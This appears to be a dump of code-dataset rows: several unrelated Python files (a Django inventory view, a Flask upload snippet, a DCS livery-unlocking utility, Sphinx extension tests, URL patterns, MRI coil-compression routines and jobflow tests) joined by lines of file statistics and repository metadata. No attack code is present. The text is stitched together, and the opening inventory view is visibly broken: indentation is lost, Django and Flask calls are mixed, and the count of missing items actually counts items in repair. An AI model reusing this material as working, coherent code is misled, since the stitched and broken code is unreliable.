uploaded_file_url = '/tcli/media/inv1.jpg'
#print('uploaded_file_url =',uploaded_file_url)
#print('model=',model)
#print(model.image_file)
image_file = model.image_file
if image_file == None:
image_file = 'inventory/images/model.jpg'
#print(image_file)
event_list = Events.objects.filter(inventory_id=inventory_id).all()
#print('event_list = ',event_list)
operator=request.user
#print('operator = ',operator)
except IOError as e:
print ("Lists load Failure ", e)
return render (request,"inventory/report.html",{"active_inv":active_inv, "uploaded_file_url":uploaded_file_url,"event_list":event_list,
"today":date.today(),'event':event,'active_operator':operator})
def inv_report(request):
inv_list = []
models_list = []
model_list = []
curr_quan = []
field_quan = []
repair_quan = []
missing_quan = []
#Get locationname
json_data = []
inv_list = []
inv = []
operator = str(request.user)
model = request.GET.get('model', -1)
#print('model = ',model)
category = request.GET.get('category', -1)
#print('category = ',category)
success = True
if category =='select menu' and model =='select menu' :
inv_list = Inventory.objects.all()
model_list = Inventory.objects.order_by('modelname').values_list('modelname', flat=True).distinct()
category ='All categorys'
elif not category =='select menu' and model =='select menu' :
inv_list = Inventory.objects.filter(category=category).all()
model_list = Inventory.objects.filter(category=category).order_by('modelname').values_list('modelname', flat=True).distinct()
elif not category =='select menu' and not model =='select menu' :
inv_list = Inventory.objects.filter(category=category,modelname=model).all()
model_list = Inventory.objects.filter(category=category,modelname=model).order_by('modelname').values_list('modelname', flat=True).distinct()
model_lists = []
lists =[]
for model in model_list:
total_quan=Inventory.objects.filter(modelname=model).count()
house_quan=Inventory.objects.filter(modelname=model).filter(status__icontains='In-House').count()
field_quan=Inventory.objects.filter(modelname=model).filter(status__icontains='On-Site').count()
repair_quan=Inventory.objects.filter(modelname=model).filter(status__icontains='In-Repair').count()
missing_quan=Inventory.objects.filter(modelname=model).filter(status__icontains='In-Repair').count()
list = {'modelname':model,'total_quan': total_quan, 'house_quan':house_quan,'field_quan':field_quan,'repair_quan':repair_quan,'missing_quan':missing_quan}
lists = json.dumps(list)
model_lists.append(lists)
model_lists = ListAsQuerySet(model_lists, model='Post')
print('model_list = ', model_lists)
print('inv_list = ',inv_list)
desc_list = Model.objects.order_by('description').values_list('description', flat=True).distinct()
locations_list = Location.objects.order_by('name').values_list('name', flat=True).distinct()
shelves_list = Location.objects.order_by('shelf').values_list('shelf', flat=True).distinct()
return render (request,"inventory/inv_report.html",{"inv_list":inv_list, "category":category, "models_list":model_list, "curr_quan":curr_quan, "field_quan":field_quan,
"repair_quan":repair_quan, "missing_quan":missing_quan, "today":date.today(),'active_operator':operator})
def to_json(lst,columns):
keys = []
for d in lst:
keys.append((columns,d))
data = json.dumps(keys)
return data
#https://flask.palletsprojects.com/en/1.1.x/patterns/fileuploads/
def upload_file(request):
if request.method == 'POST':
# check if the post request has the file part
if 'file' not in request.files:
flash('No file part')
return redirect(request.url)
file = request.files['file']
# if user does not select file, browser also
# submit an empty part without filename
if file.filename == '':
flash('No selected file')
return redirect(request.url)
if file and allowed_file(file.filename):
filename = secure_filename(file.filename)
file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))
return HttpResponseRedirect(reverse('uploaded_file',filename=filename))
return '''
<!doctype html>
<title>Upload new File</title>
<h1>Upload new File</h1>
<form method=post enctype=multipart/form-data>
<input type=file name=file>
<input type=submit value=Upload>
</form>
'''
class ListAsQuerySet(list):
def __init__(self, *args, model, **kwargs):
self.model = model
super().__init__(*args, **kwargs)
def filter(self, *args, **kwargs):
return self # filter ignoring, but you can impl custom filter
def order_by(self, *args, **kwargs):
return self
| 61.896694 | 422 | 0.650845 | 5,273 | 44,937 | 5.369619 | 0.051204 | 0.060394 | 0.071166 | 0.039556 | 0.827824 | 0.78855 | 0.758706 | 0.745073 | 0.713746 | 0.678746 | 0 | 0.003301 | 0.224626 | 44,937 | 725 | 423 | 61.982069 | 0.809316 | 0.105793 | 0 | 0.506 | 0 | 0.006 | 0.143264 | 0.007531 | 0 | 0 | 0 | 0 | 0 | 1 | 0.034 | false | 0 | 0.034 | 0.004 | 0.124 | 0.054 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
2da01ac4f3819ce411300e5c956371d10a783cf2 | 39 | py | Python | dskc/io/__init__.py | NovaSBE-DSKC/predict-campaing-sucess-rate | fec339aee7c883f55d64130eb69e490f765ee27d | [
"MIT"
] | null | null | null | dskc/io/__init__.py | NovaSBE-DSKC/predict-campaing-sucess-rate | fec339aee7c883f55d64130eb69e490f765ee27d | [
"MIT"
] | null | null | null | dskc/io/__init__.py | NovaSBE-DSKC/predict-campaing-sucess-rate | fec339aee7c883f55d64130eb69e490f765ee27d | [
"MIT"
] | null | null | null | from dskc.io.util import get_root_path
| 19.5 | 38 | 0.846154 | 8 | 39 | 3.875 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.102564 | 39 | 1 | 39 | 39 | 0.885714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
2df5b13ea0af85acc49f9bd60510aa46e1372b34 | 7,524 | py | Python | src/utils.py | LombardiDaniel/dcs-nation-skin-unlocker | 943e74108eef25090b9d2b1099195c563bbfdd17 | [
"MIT"
] | 7 | 2021-08-23T20:04:45.000Z | 2022-02-17T15:20:27.000Z | src/utils.py | LombardiDaniel/dcs-nation-skin-unlocker | 943e74108eef25090b9d2b1099195c563bbfdd17 | [
"MIT"
] | 1 | 2022-02-16T22:58:09.000Z | 2022-02-17T02:47:13.000Z | src/utils.py | LombardiDaniel/dcs-nation-skin-unlocker | 943e74108eef25090b9d2b1099195c563bbfdd17 | [
"MIT"
] | 1 | 2022-03-27T00:15:58.000Z | 2022-03-27T00:15:58.000Z | import os
def check_saved_games(saved_games_dcs_dir):
for folder_name in os.listdir(saved_games_dcs_dir):
if folder_name in ('DCS', 'DCS.openbeta'):
return True
return False
class Utils:
def __init__(self):
self.dcs_dir = ''
self.saved_games_dcs_dir = ''
# self.window = ui_window
def ready(self):
return self.dcs_dir != '' and self.saved_games_dcs_dir != ''
def fix_default_liveries(self):
aircrafts_dir = os.path.join(self.dcs_dir, 'CoreMods', 'aircraft')
for aircraft_name in os.listdir(aircrafts_dir):
if not aircraft_name.endswith('Pack'):
aircraft_liveries_dir = os.path.join(aircrafts_dir, aircraft_name, 'Liveries')
if os.path.isdir(aircraft_liveries_dir):
for arcraft_var_name in os.listdir(aircraft_liveries_dir):
arcraft_var_dir = os.path.join(aircraft_liveries_dir, arcraft_var_name)
if os.path.isdir(arcraft_var_dir):
for livery_name in os.listdir(arcraft_var_dir):
description_lua_path = os.path.join(arcraft_var_dir, livery_name, 'description.lua')
if os.path.isfile(description_lua_path):
lines = []
print(description_lua_path)
with open(description_lua_path, 'r', encoding='utf-8') as f:
lines = f.readlines()
for i, line in enumerate(lines):
if 'countries = {' in line:
print(f'Unlocking: {description_lua_path}')
lines[i] = line.replace('countries = {', '-- countries = {')
with open(description_lua_path, 'w', encoding='utf-8') as f:
f.writelines(lines)
def fix_mods_liveries(self):
aircrafts_dir = os.path.join(self.saved_games_dcs_dir, 'mods', 'aircraft')
if os.path.isdir(aircrafts_dir):
for aircraft_name in os.listdir(aircrafts_dir):
if not aircraft_name.endswith('Pack'):
aircraft_liveries_dir = os.path.join(aircrafts_dir, aircraft_name, 'Liveries')
if os.path.isdir(aircraft_liveries_dir):
for arcraft_var_name in os.listdir(aircraft_liveries_dir):
arcraft_var_dir = os.path.join(aircraft_liveries_dir, arcraft_var_name)
if os.path.isdir(arcraft_var_dir):
for livery_name in os.listdir(arcraft_var_dir):
description_lua_path = os.path.join(arcraft_var_dir, livery_name, 'description.lua')
if os.path.isfile(description_lua_path):
lines = []
print(description_lua_path)
with open(description_lua_path, 'r', encoding='utf-8') as f:
lines = f.readlines()
for i, line in enumerate(lines):
if 'countries = {' in line:
print(f'Unlocking: {description_lua_path}')
lines[i] = line.replace('countries = {', '-- countries = {')
with open(description_lua_path, 'w') as f:
f.writelines(lines)
def fix_bazar_liveries(self):
aircrafts_dir = os.path.join(self.dcs_dir, 'Bazar', 'liveries')
for aircraft_name in os.listdir(aircrafts_dir):
if not aircraft_name.endswith('Pack'):
aircraft_liveries_dir = os.path.join(aircrafts_dir, aircraft_name)
for livery_name in os.listdir(aircraft_liveries_dir):
livery_dir = os.path.join(aircraft_liveries_dir, livery_name)
description_lua_path = os.path.join(livery_dir, 'description.lua')
if os.path.isfile(description_lua_path):
lines = []
print(description_lua_path)
with open(description_lua_path, 'r', encoding='utf-8') as f:
lines = f.readlines()
for i, line in enumerate(lines):
if 'countries = {' in line:
print(f'Unlocking: {description_lua_path}')
lines[i] = line.replace('countries = {', '-- countries = {')
with open(description_lua_path, 'w', encoding='utf-8') as f:
f.writelines(lines)
def fix_downloaded_liveries(self):
liveries_dir = os.path.join(self.saved_games_dcs_dir, 'Liveries')
if os.path.isdir(liveries_dir):
for aircraft_name in os.listdir(liveries_dir):
if not aircraft_name.endswith('Pack'):
aircraft_liveries_dir = os.path.join(liveries_dir, aircraft_name)
if os.path.isdir(aircraft_liveries_dir):
if os.path.isdir(aircraft_liveries_dir):
for livery_name in os.listdir(aircraft_liveries_dir):
description_lua_path = os.path.join(aircraft_liveries_dir, livery_name, 'description.lua')
if os.path.isfile(description_lua_path):
lines = []
print(description_lua_path)
with open(description_lua_path, 'r', encoding='utf-8') as f:
lines = f.readlines()
for i, line in enumerate(lines):
if 'countries = {' in line and '--' not in line:
print(f'Unlocking: {description_lua_path}')
lines[i] = line.replace('countries = {', '-- countries = {')
print(lines[i])
with open(description_lua_path, 'w') as f:
f.writelines(lines)
class Notifier:
'''
Notifications wrapper
'''
def __init__(self, window):
self.window = window
self.buffer = ''
def notify(self, msg):
'''
Writes notification to the notifications area.
'''
self.window['-NOTIFICATIONS-'].update(visible=True)
self.window['-NOTIFICATIONS-'].update(value=msg)
self.buffer = msg
def add(self, msg):
'''
Adds a notification to the notifications area.
'''
self.window['-NOTIFICATIONS-'].update(visible=True)
self.window['-NOTIFICATIONS-'].update(value=self.buffer + msg)
self.buffer += msg
def clear(self):
'''
Clears the notifications area.
'''
self.window['-NOTIFICATIONS-'].update(value='')
self.window['-NOTIFICATIONS-'].update(visible=False)
self.buffer = ''
| 43.491329 | 122 | 0.498272 | 750 | 7,524 | 4.754667 | 0.113333 | 0.109927 | 0.121144 | 0.04627 | 0.850252 | 0.810151 | 0.80258 | 0.76332 | 0.748458 | 0.705833 | 0 | 0.001347 | 0.407895 | 7,524 | 172 | 123 | 43.744186 | 0.799102 | 0.022727 | 0 | 0.631579 | 0 | 0 | 0.080627 | 0.012108 | 0 | 0 | 0 | 0 | 0 | 1 | 0.096491 | false | 0 | 0.008772 | 0.008772 | 0.149123 | 0.078947 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
9373c2a64e8bb931ae3aa37f9d2ceee778f035de | 5,538 | py | Python | _unittests/ut_sphinxext/test_todoext_extension.py | Pandinosaurus/pyquickhelper | 326276f656cf88989e4d0fcd006ada0d3735bd9e | [
"MIT"
] | 18 | 2015-11-10T08:09:23.000Z | 2022-02-16T11:46:45.000Z | _unittests/ut_sphinxext/test_todoext_extension.py | Pandinosaurus/pyquickhelper | 326276f656cf88989e4d0fcd006ada0d3735bd9e | [
"MIT"
] | 321 | 2015-06-14T21:34:28.000Z | 2021-11-28T17:10:03.000Z | _unittests/ut_sphinxext/test_todoext_extension.py | Pandinosaurus/pyquickhelper | 326276f656cf88989e4d0fcd006ada0d3735bd9e | [
"MIT"
] | 10 | 2015-06-20T01:35:00.000Z | 2022-01-19T15:54:32.000Z | """
@brief test log(time=4s)
@author Xavier Dupre
"""
import sys
import os
import unittest
from docutils.parsers.rst import directives
from pyquickhelper.loghelper.flog import fLOG
from pyquickhelper.pycode import get_temp_folder
from pyquickhelper.helpgen import rst2html
from pyquickhelper.sphinxext import TodoExt, TodoExtList
from pyquickhelper.sphinxext.sphinx_todoext_extension import todoext_node, visit_todoext_node, depart_todoext_node
class TestTodoExtExtension(unittest.TestCase):
def test_post_parse_sn_todoext(self):
fLOG(
__file__,
self._testMethodName,
OutputPrint=__name__ == "__main__")
directives.register_directive("todoext", TodoExt)
directives.register_directive("todoextlist", TodoExtList)
def test_todoext(self):
fLOG(
__file__,
self._testMethodName,
OutputPrint=__name__ == "__main__")
from docutils import nodes as skip_
content = """
test a directive
================
before
.. todoext::
:title: first todo
:tag: bug
:issue: 7
this code shoud appear___
after
""".replace(" ", "")
if sys.version_info[0] >= 3:
content = content.replace('u"', '"')
tives = [("todoext", TodoExt, todoext_node,
visit_todoext_node, depart_todoext_node)]
html = rst2html(content, writer="custom", keep_warnings=True,
directives=tives, extlinks={'issue': ('http://%s', '_issue_')})
temp = get_temp_folder(__file__, "temp_todoext")
with open(os.path.join(temp, "out_todoext.html"), "w", encoding="utf8") as f:
f.write(html)
t1 = "this code shoud appear"
if t1 not in html:
raise Exception(html)
t1 = "after"
if t1 not in html:
raise Exception(html)
t1 = "first todo"
if t1 not in html:
raise Exception(html)
t1 = "(bug)"
if t1 not in html:
raise Exception(html)
t1 = 'href="http://7"'
if t1 not in html:
raise Exception(html)
def test_todoextlist(self):
fLOG(
__file__,
self._testMethodName,
OutputPrint=__name__ == "__main__")
from docutils import nodes as skip_
content = """
test a directive
================
before
.. todoext::
:title: first todo
this code shoud appear___
middle
.. todoextlist::
after
""".replace(" ", "")
if sys.version_info[0] >= 3:
content = content.replace('u"', '"')
tives = [("todoext", TodoExt, todoext_node,
visit_todoext_node, depart_todoext_node)]
html = rst2html(content, writer="rst", keep_warnings=True,
directives=tives, layout="sphinx",
todoext_include_todosext=True)
temp = get_temp_folder(__file__, "temp_todoextlist")
with open(os.path.join(temp, "out_todoext.html"), "w", encoding="utf8") as f:
f.write(html)
t1 = "this code shoud appear"
if t1 not in html:
raise Exception(html)
t1 = "after"
if t1 not in html:
raise Exception(html)
t1 = "first todo"
if t1 not in html:
raise Exception(html)
t1 = "(The `original entry"
if t1 not in html:
raise Exception(html)
def test_todoext_done(self):
fLOG(
__file__,
self._testMethodName,
OutputPrint=__name__ == "__main__")
from docutils import nodes as skip_
content = """
test a directive
================
before
.. todoext::
:title: first todo
:tag: bug
:issue: 7
:hidden:
this code shoud appear___
after
""".replace(" ", "")
if sys.version_info[0] >= 3:
content = content.replace('u"', '"')
tives = [("todoext", TodoExt, todoext_node,
visit_todoext_node, depart_todoext_node)]
html = rst2html(content, writer="custom", keep_warnings=True,
directives=tives, extlinks={'issue': ('http://%s', '_issue_')})
temp = get_temp_folder(__file__, "temp_todoext")
with open(os.path.join(temp, "out_todoext.html"), "w", encoding="utf8") as f:
f.write(html)
t1 = "this code shoud appear"
if t1 in html:
raise Exception(html)
t1 = "after"
if t1 not in html:
raise Exception(html)
t1 = "first todo"
if t1 in html:
raise Exception(html)
t1 = "(bug)"
if t1 in html:
raise Exception(html)
t1 = 'href="http://7"'
if t1 in html:
raise Exception(html)
if __name__ == "__main__":
unittest.main()
| 27.69 | 114 | 0.498375 | 535 | 5,538 | 4.893458 | 0.203738 | 0.032086 | 0.058824 | 0.106952 | 0.756303 | 0.744461 | 0.734912 | 0.725745 | 0.708938 | 0.668449 | 0 | 0.01383 | 0.399422 | 5,538 | 199 | 115 | 27.829146 | 0.773301 | 0.009751 | 0 | 0.815603 | 0 | 0 | 0.283784 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.028369 | false | 0 | 0.085106 | 0 | 0.120567 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
fa76f83344682464aa866ac9ac2702e7db6b9a16 | 484 | py | Python | htsworkflow/frontend/reports/urls.py | detrout/htsworkflow | 99d3300e2533d79428ad49aaf10b9429b175da2d | [
"BSD-3-Clause"
] | null | null | null | htsworkflow/frontend/reports/urls.py | detrout/htsworkflow | 99d3300e2533d79428ad49aaf10b9429b175da2d | [
"BSD-3-Clause"
] | 1 | 2018-02-26T18:30:05.000Z | 2018-02-26T18:30:05.000Z | htsworkflow/frontend/reports/urls.py | detrout/htsworkflow | 99d3300e2533d79428ad49aaf10b9429b175da2d | [
"BSD-3-Clause"
] | null | null | null | from django.conf.urls import patterns
urlpatterns = patterns('',
(r'^updLibInfo$', 'htsworkflow.frontend.reports.libinfopar.refreshLibInfoFile'),
(r'^report$', 'htsworkflow.frontend.reports.reports.report1'),
(r'^report_RM$', 'htsworkflow.frontend.reports.reports.report_RM'),
(r'^report_FCs$', 'htsworkflow.frontend.reports.reports.getNotRanFCs'),
(r'^liblist$', 'htsworkflow.frontend.reports.reports.test_Libs')
)
| 48.4 | 84 | 0.663223 | 47 | 484 | 6.744681 | 0.468085 | 0.299685 | 0.410095 | 0.416404 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002513 | 0.177686 | 484 | 9 | 85 | 53.777778 | 0.79397 | 0 | 0 | 0 | 0 | 0 | 0.609504 | 0.502066 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.125 | 0 | 0.125 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
fab3b230e9c8415a9b6f8d083fee2b797fefea58 | 65 | py | Python | Model_Explanation/__init__.py | karthi12ck/Model-Explanation | 08822797d12f0598706abae3a65d4fe8d6ee294a | [
"MIT"
] | null | null | null | Model_Explanation/__init__.py | karthi12ck/Model-Explanation | 08822797d12f0598706abae3a65d4fe8d6ee294a | [
"MIT"
] | null | null | null | Model_Explanation/__init__.py | karthi12ck/Model-Explanation | 08822797d12f0598706abae3a65d4fe8d6ee294a | [
"MIT"
] | null | null | null | from Model_Explanaton.Model_Explanation import Model_Explanation
| 32.5 | 64 | 0.923077 | 8 | 65 | 7.125 | 0.625 | 0.561404 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.061538 | 65 | 1 | 65 | 65 | 0.934426 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
87de94a52cc733aaf892fda6010c3ca442764dc9 | 7,149 | py | Python | utils/coilcomp.py | milesgray/CALAE | a2ab2f7d9ee17cc6c24ff6ac370b0373537079ac | [
"Apache-2.0"
] | null | null | null | utils/coilcomp.py | milesgray/CALAE | a2ab2f7d9ee17cc6c24ff6ac370b0373537079ac | [
"Apache-2.0"
] | null | null | null | utils/coilcomp.py | milesgray/CALAE | a2ab2f7d9ee17cc6c24ff6ac370b0373537079ac | [
"Apache-2.0"
] | null | null | null | """Coil compression.
Reference(s):
[1] Zhang T, Pauly JM, Vasanawala SS, Lustig M. Coil compression for
accelerated imaging with Cartesian sampling. Magn Reson Med 2013
Mar 9;69:571-582
"""
import os
import sys
import numpy as np
from mri_util import fftc
def calc_gcc_weights_c(ks_calib, num_virtual_channels, correction=True):
"""Calculate coil compression weights.
Input
ks_calib -- raw k-space data of dimensions
(num_channels, num_readout, num_kx)
num_virtual_channels -- number of virtual channels to compress to
correction -- apply rotation correction (default: True)
Output
cc_mat -- coil compression matrix (use apply_gcc_weights)
"""
me = "coilcomp.calc_gcc_weights_c"
num_kx = ks_calib.shape[2]
# num_readout = ks_calib.shape[1]
num_channels = ks_calib.shape[0]
if num_virtual_channels > num_channels:
print(
[
"%s> Num of virtual channels (%d) is more than the actual "
+ " channels (%d)!"
]
% (me, num_virtual_channels, num_channels)
)
return np.eye(num_channels, dtype=np.complex64)
if num_kx > 1:
# find max in readout
tmp = np.sum(np.sum(np.power(np.abs(ks_calib), 2), axis=0), axis=1)
i_xmax = np.argmax(tmp)
# circ shift to move max to center (make copy to not touch original data)
ks_calib_int = np.roll(ks_calib.copy(), int(num_kx / 2 - i_xmax), axis=-1)
ks_calib_int = fftc.ifftc(ks_calib_int, axis=-1)
else:
ks_calib_int = ks_calib.copy()
cc_mat = np.zeros((num_virtual_channels, num_channels, num_kx), dtype=np.complex64)
for i_x in range(num_kx):
ks_calib_x = np.squeeze(ks_calib_int[:, :, i_x])
U, s, Vh = np.linalg.svd(ks_calib_x.T, full_matrices=False)
V = Vh.conj()
cc_mat[:, :, i_x] = V[0:num_virtual_channels, :]
if correction:
for i_x in range(int(num_kx / 2) - 2, -1, -1):
V1 = cc_mat[:, :, i_x + 1]
V2 = cc_mat[:, :, i_x]
A = np.matmul(V1.conj(), V2.T)
Ua, sa, Vah = np.linalg.svd(A, full_matrices=False)
P = np.matmul(Ua, Vah)
P = P.conj()
cc_mat[:, :, i_x] = np.matmul(P, cc_mat[:, :, i_x])
for i_x in range(int(num_kx / 2) - 1, num_kx, 1):
V1 = cc_mat[:, :, i_x - 1]
V2 = cc_mat[:, :, i_x]
A = np.matmul(V1.conj(), V2.T)
Ua, sa, Vah = np.linalg.svd(A, full_matrices=False)
P = np.matmul(Ua, Vah)
P = P.conj()
cc_mat[:, :, i_x] = np.matmul(P, np.squeeze(cc_mat[:, :, i_x]))
return cc_mat
def apply_gcc_weights_c(ks, cc_mat):
"""Apply coil compression weights.
Input
ks -- raw k-space data of dimensions (num_channels, num_readout, num_kx)
cc_mat -- coil compression matrix calculated using calc_gcc_weights
Output
ks_out -- coil compresssed data
"""
me = "coilcomp.apply_gcc_weights_c"
num_channels = ks.shape[0]
num_readout = ks.shape[1]
num_kx = ks.shape[2]
num_virtual_channels = cc_mat.shape[0]
if num_channels != cc_mat.shape[1]:
print("%s> ERROR! num channels does not match!" % me)
print("%s> ks: num channels = %d" % (me, num_channels))
print("%s> cc_mat: num channels = %d" % (me, cc_mat.shape[1]))
ks_x = fftc.ifftc(ks, axis=-1)
ks_out = np.zeros((num_virtual_channels, num_readout, num_kx), dtype=np.complex64)
for i_channel in range(num_virtual_channels):
cc_mat_i = np.reshape(cc_mat[i_channel, :, :], (num_channels, 1, num_kx))
ks_out[i_channel, :, :] = np.sum(ks_x * cc_mat_i, axis=0)
ks_out = fftc.fftc(ks_out, axis=-1)
return ks_out
def calc_gcc_weights(ks_calib, num_virtual_channels, correction=True):
"""Calculate coil compression weights.
Input
ks_calib -- raw k-space data of dimensions (num_kx, num_readout, num_channels)
num_virtual_channels -- number of virtual channels to compress to
correction -- apply rotation correction (default: True)
Output
cc_mat -- coil compression matrix (use apply_gcc_weights)
"""
me = "coilcomp.calc_gcc_weights"
num_kx = ks_calib.shape[0]
# num_readout = ks_calib.shape[1]
num_channels = ks_calib.shape[2]
if num_virtual_channels > num_channels:
print(
"%s> Num of virtual channels (%d) is more than the actual channels (%d)!"
% (me, num_virtual_channels, num_channels)
)
return np.eye(num_channels, dtype=complex)
# find max in readout
tmp = np.sum(np.sum(np.power(np.abs(ks_calib), 2), axis=2), axis=1)
i_xmax = np.argmax(tmp)
# circ shift to move max to center (make copy to not touch original data)
ks_calib_int = np.roll(ks_calib.copy(), int(num_kx / 2 - i_xmax), axis=0)
ks_calib_int = fftc.ifftc(ks_calib_int, axis=0)
cc_mat = np.zeros((num_kx, num_channels, num_virtual_channels), dtype=complex)
for i_x in range(num_kx):
ks_calib_x = np.squeeze(ks_calib_int[i_x, :, :])
U, s, Vh = np.linalg.svd(ks_calib_x, full_matrices=False)
V = Vh.conj().T
cc_mat[i_x, :, :] = V[:, 0:num_virtual_channels]
if correction:
for i_x in range(int(num_kx / 2) - 2, -1, -1):
V1 = cc_mat[i_x + 1, :, :]
V2 = cc_mat[i_x, :, :]
A = np.matmul(V1.conj().T, V2)
Ua, sa, Vah = np.linalg.svd(A, full_matrices=False)
P = np.matmul(Ua, Vah)
P = P.conj().T
cc_mat[i_x, :, :] = np.matmul(cc_mat[i_x, :, :], P)
for i_x in range(int(num_kx / 2) - 1, num_kx, 1):
V1 = cc_mat[i_x - 1, :, :]
V2 = cc_mat[i_x, :, :]
A = np.matmul(V1.conj().T, V2)
Ua, sa, Vah = np.linalg.svd(A, full_matrices=False)
P = np.matmul(Ua, Vah)
P = P.conj().T
cc_mat[i_x, :, :] = np.matmul(np.squeeze(cc_mat[i_x, :, :]), P)
return cc_mat
def apply_gcc_weights(ks, cc_mat):
""" Apply coil compression weights
Input
ks -- raw k-space data of dimensions (num_kx, num_readout, num_channels)
cc_mat -- coil compression matrix calculated using calc_gcc_weights
Output
ks_out -- coil compresssed data
"""
me = "coilcomp.apply_gcc_weights"
if ks.shape[2] != cc_mat.shape[1]:
print("%s> ERROR! num channels does not match!" % me)
print("%s> ks: num channels = %d" % (me, ks.shape[2]))
print("%s> cc_mat: num channels = %d" % (me, cc_mat.shape[1]))
num_kx = ks.shape[0]
num_readout = ks.shape[1]
num_channels = ks.shape[2]
num_virtual_channels = cc_mat.shape[2]
ks_x = fftc.ifftc(ks, axis=0)
ks_out = np.zeros((num_kx, num_readout, num_virtual_channels), dtype=complex)
for i_channel in range(num_virtual_channels):
cc_mat_i = np.reshape(cc_mat[:, :, i_channel], (num_kx, 1, num_channels))
ks_out[:, :, i_channel] = np.sum(ks_x * cc_mat_i, axis=2)
ks_out = fftc.fftc(ks_out, axis=0)
return ks_out
| 35.391089 | 87 | 0.600643 | 1,123 | 7,149 | 3.587711 | 0.127337 | 0.052122 | 0.035741 | 0.031273 | 0.897493 | 0.864731 | 0.820055 | 0.769422 | 0.769422 | 0.720774 | 0 | 0.018519 | 0.26731 | 7,149 | 201 | 88 | 35.567164 | 0.750668 | 0.215135 | 0 | 0.4 | 0 | 0 | 0.081046 | 0.019393 | 0 | 0 | 0 | 0 | 0 | 1 | 0.033333 | false | 0 | 0.033333 | 0 | 0.116667 | 0.066667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
87f1ca2c8051586c4c21e17fc2a5c86fa8ae9715 | 11,620 | py | Python | tests/managers/test_local.py | arosen93/jobflow | fbd5868394c6f4f6b4f2e0ccf4b7ff7d21fe7258 | [
"BSD-3-Clause-LBNL"
] | 10 | 2021-11-13T07:43:27.000Z | 2022-03-14T11:05:15.000Z | tests/managers/test_local.py | arosen93/jobflow | fbd5868394c6f4f6b4f2e0ccf4b7ff7d21fe7258 | [
"BSD-3-Clause-LBNL"
] | 69 | 2021-08-31T13:15:54.000Z | 2022-03-31T21:43:56.000Z | tests/managers/test_local.py | arosen93/jobflow | fbd5868394c6f4f6b4f2e0ccf4b7ff7d21fe7258 | [
"BSD-3-Clause-LBNL"
] | 5 | 2021-10-17T03:52:57.000Z | 2022-03-31T00:17:20.000Z | import pytest
def test_simple_job(memory_jobstore, clean_dir, simple_job):
from jobflow import run_locally
# run with log
job = simple_job("12345")
uuid = job.uuid
responses = run_locally(job, store=memory_jobstore)
# check responses has been filled
assert responses[uuid][1].output == "12345_end"
# check store has the activity output
result = memory_jobstore.query_one({"uuid": uuid})
assert result["output"] == "12345_end"
# test run no store
job = simple_job("12345")
uuid = job.uuid
responses = run_locally(job)
assert responses[uuid][1].output == "12345_end"
def test_simple_flow(memory_jobstore, clean_dir, simple_flow, capsys):
from pathlib import Path
from jobflow import run_locally
flow = simple_flow()
uuid = flow.jobs[0].uuid
# run without log
run_locally(flow, store=memory_jobstore, log=False)
captured = capsys.readouterr()
assert "INFO Started executing jobs locally" not in captured.out
assert "INFO Finished executing jobs locally" not in captured.out
# run with log
responses = run_locally(flow, store=memory_jobstore)
# check responses has been filled
assert responses[uuid][1].output == "12345_end"
# check store has the activity output
result = memory_jobstore.query_one({"uuid": uuid})
assert result["output"] == "12345_end"
# check no folders were written
folders = list(Path(".").glob("job_*/"))
assert len(folders) == 0
# check logs printed
captured = capsys.readouterr()
assert "INFO Started executing jobs locally" in captured.out
assert "INFO Finished executing jobs locally" in captured.out
# run with folders
responses = run_locally(flow, store=memory_jobstore, create_folders=True)
assert responses[uuid][1].output == "12345_end"
folders = list(Path(".").glob("job_*/"))
assert len(folders) == 1
